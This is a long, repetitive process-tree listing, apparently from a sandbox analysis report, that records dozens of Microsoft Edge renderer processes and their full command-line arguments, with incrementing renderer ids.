C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7544 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6580 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4240 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1800 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3964 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7872 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7604 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7628 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6868 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7488 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8092 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7968 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7772 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1660 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7520 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8528 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7072 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7040 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8208 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8560 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8668 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9312 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9452 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9344 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7604 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10208 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9372 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9364 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9048 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6612 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9700 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10780 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8668 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8576 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8620 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10772 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9532 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10588 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10484 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10804 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9888 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9944 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9032 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8620 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10560 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=100 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10800 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10604 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=102 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1120 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=103 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11244 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=104 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8456 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=105 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=106 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10800 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=107 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9108 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=108 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11180 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=109 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=110 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=111 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10996 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=112 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11036 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=113 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11404 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=114 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1924 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=115 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11104 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=116 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7420 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
